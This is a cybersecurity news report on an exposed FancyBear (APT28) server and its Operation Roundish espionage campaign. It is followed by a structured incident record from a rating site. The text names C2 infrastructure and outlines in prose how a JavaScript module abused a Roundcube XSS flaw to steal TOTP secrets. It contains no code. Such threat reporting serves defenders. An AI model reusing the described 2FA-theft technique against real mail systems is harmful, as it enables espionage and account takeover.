FancyBear’s Major OpSec Blunder Exposes Espionage Campaign Targeting European Governments and NATO
In a rare operational security failure, Russian state-linked hacking group FancyBear (APT28/Forest Blizzard/GRU Unit 26165) inadvertently exposed a long-running cyberespionage campaign after leaving a server unsecured for over 500 days. The breach, first detected by threat intelligence firm Hunt.io on January 13, 2026, and later analyzed by Ctrl-Alt-Intel, provided researchers with unprecedented visibility into Operation Roundish, an active campaign targeting government and military entities across Europe.
The exposed server a NameCheap Virtual Private Server (VPS) hosted in the U.S. at IP 203.161.50.145 had been previously attributed to FancyBear by Ukraine’s CERT-UA in September 2024, yet the group continued using it without interruption. The open directory contained 2,800 exfiltrated government and military emails, 240 stolen credentials (including passwords and TOTP 2FA secrets), 140 silent email-forwarding rules, and 11,500 harvested contact addresses from victims in Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. Notably, the stolen data included email addresses tied to four NATO member states, including NATO’s own headquarters infrastructure.
A second exposed directory, discovered by Ctrl-Alt-Intel, revealed even more sensitive material: FancyBear’s full command-and-control (C2) source code, additional JavaScript payloads, campaign telemetry logs, and further exfiltrated data. The targeting pattern aligned with geopolitical priorities, with Ukraine’s regional prosecutors (likely linked to war crimes investigations) as the largest victim group. Other high-profile targets included Romania’s Air Force, Greece’s National Defence General Staff, Serbia’s Ministry of Defence, and Bulgarian government entities all nations involved in recent military cooperation, such as Greece’s training of Ukrainian F-16 pilots and a 2024 military mobility agreement between Romania, Bulgaria, and Greece.
The most alarming technical aspect of the campaign was FancyBear’s method for silently bypassing 2FA. Using a JavaScript module (keyTwoAuth.js), the group exploited a Roundcube webmail XSS vulnerability to extract TOTP secrets and recovery codes from authenticated sessions without victim interaction. The module parsed the twofactorgauthenticator plugin settings, encoded the stolen data, and exfiltrated it to the group’s C2 server (zhblz.com) under the log prefix ktfu. Researchers recovered 516 log entries from 108 unique victim addresses, with 256 accounts having their TOTP secrets compromised including targets at Romania’s Air Force, Greece’s GEETHA, Ukraine’s Asset Recovery Agency, and Serbia’s Ministry of Defence. The remaining 260 accounts had no 2FA enabled, making them trivial to access.
The exposure underscores the group’s persistent reliance on known infrastructure despite prior attribution, as well as the sophistication of its 2FA bypass techniques. While the incident provides defenders with critical intelligence, it also highlights the ongoing threat posed by FancyBear to NATO-aligned governments and military organizations.
Source: https://cybersecuritynews.com/fancybear-server-exposure-reveals-stolen-credentials/
NATO cybersecurity rating report: https://www.rankiteo.com/company/nato
"id": "NAT1773851315",
"linkid": "nato",
"type": "Cyber Attack",
"date": "3/2026",
"severity": "100",
"impact": "6",
"explanation": "Attack threatening the economy of geographical region"{'affected_entities': [{'industry': 'Law enforcement/judicial',
'location': 'Ukraine',
'name': 'Ukraine’s regional prosecutors',
'type': 'Government'},
{'industry': 'Defense',
'location': 'Romania',
'name': 'Romania’s Air Force',
'type': 'Military'},
{'industry': 'Defense',
'location': 'Greece',
'name': 'Greece’s National Defence General Staff '
'(GEETHA)',
'type': 'Military'},
{'industry': 'Defense',
'location': 'Serbia',
'name': 'Serbia’s Ministry of Defence',
'type': 'Government'},
{'industry': 'Public sector',
'location': 'Bulgaria',
'name': 'Bulgarian government entities',
'type': 'Government'},
{'industry': 'Defense/military alliance',
'location': 'Multiple (NATO member states)',
'name': 'NATO headquarters infrastructure',
'type': 'International organization'}],
'attack_vector': 'Exposed server (unsecured VPS), JavaScript payloads (XSS '
'vulnerability in Roundcube webmail)',
'data_breach': {'data_exfiltration': True,
'file_types_exposed': ['Emails',
'JavaScript payloads',
'Telemetry logs',
'Credentials'],
'number_of_records_exposed': '2,800 emails, 240 credentials, '
'11,500 contact addresses',
'personally_identifiable_information': 'Email addresses, TOTP '
'secrets, recovery '
'codes',
'sensitivity_of_data': 'High (military/defense '
'communications, 2FA secrets, '
'NATO-related data)',
'type_of_data_compromised': ['Government/military emails',
'Credentials (passwords, TOTP '
'secrets)',
'Contact addresses',
'Email-forwarding rules']},
'date_detected': '2026-01-13',
'description': 'In a rare operational security failure, Russian state-linked '
'hacking group FancyBear (APT28/Forest Blizzard/GRU Unit '
'26165) inadvertently exposed a long-running cyberespionage '
'campaign after leaving a server unsecured for over 500 days. '
'The breach provided researchers with unprecedented visibility '
'into Operation Roundish, an active campaign targeting '
'government and military entities across Europe. The exposed '
'server contained exfiltrated emails, stolen credentials, '
'silent email-forwarding rules, and harvested contact '
'addresses from victims in Ukraine, Romania, Bulgaria, Greece, '
'Serbia, and North Macedonia, including NATO member states.',
'impact': {'brand_reputation_impact': 'Significant reputational damage to '
'targeted governments and NATO due to '
'exposure of sensitive data',
'data_compromised': '2,800 exfiltrated government and military '
'emails, 240 stolen credentials (including '
'passwords and TOTP 2FA secrets), 140 silent '
'email-forwarding rules, 11,500 harvested '
'contact addresses',
'identity_theft_risk': 'High (TOTP secrets and recovery codes '
'compromised)',
'operational_impact': 'Compromised 2FA protections, unauthorized '
'access to sensitive communications, '
'potential long-term espionage capabilities',
'systems_affected': 'Government and military email systems '
'(Roundcube webmail), NATO infrastructure'},
'initial_access_broker': {'high_value_targets': ['Ukraine’s regional '
'prosecutors',
'Romania’s Air Force',
'Greece’s GEETHA',
'Serbia’s Ministry of '
'Defence',
'NATO infrastructure']},
'investigation_status': 'Ongoing (exposed data analyzed by researchers)',
'lessons_learned': 'FancyBear’s persistent reliance on known infrastructure '
'despite prior attribution; sophistication of 2FA bypass '
'techniques; risks of unsecured servers in state-sponsored '
'campaigns.',
'motivation': 'State-sponsored espionage, geopolitical intelligence gathering',
'post_incident_analysis': {'corrective_actions': 'Secure exposed servers; '
'revoke and rotate all '
'compromised credentials; '
'implement stricter access '
'controls for '
'government/military email '
'systems; deploy enhanced '
'monitoring for '
'state-sponsored threat '
'activity.',
'root_causes': 'Unsecured VPS server (NameCheap) '
'left exposed for 500+ days; '
'exploitation of Roundcube XSS '
'vulnerability; lack of operational '
'security (OpSec) discipline in '
'reusing attributed '
'infrastructure.'},
'recommendations': 'Immediate revocation of compromised credentials and TOTP '
'secrets; patching Roundcube XSS vulnerabilities; enhanced '
'monitoring of email systems; network segmentation for '
'sensitive government/military infrastructure; regular '
'audits of third-party VPS security.',
'references': [{'source': 'Hunt.io'},
{'source': 'Ctrl-Alt-Intel'},
{'source': 'Ukraine’s CERT-UA'}],
'response': {'third_party_assistance': 'Hunt.io, Ctrl-Alt-Intel, Ukraine’s '
'CERT-UA'},
'threat_actor': 'FancyBear (APT28/Forest Blizzard/GRU Unit 26165)',
'title': 'FancyBear’s Major OpSec Blunder Exposes Espionage Campaign '
'Targeting European Governments and NATO',
'type': 'Cyberespionage',
'vulnerability_exploited': 'Roundcube webmail XSS vulnerability, '
'twofactorgauthenticator plugin misconfiguration'}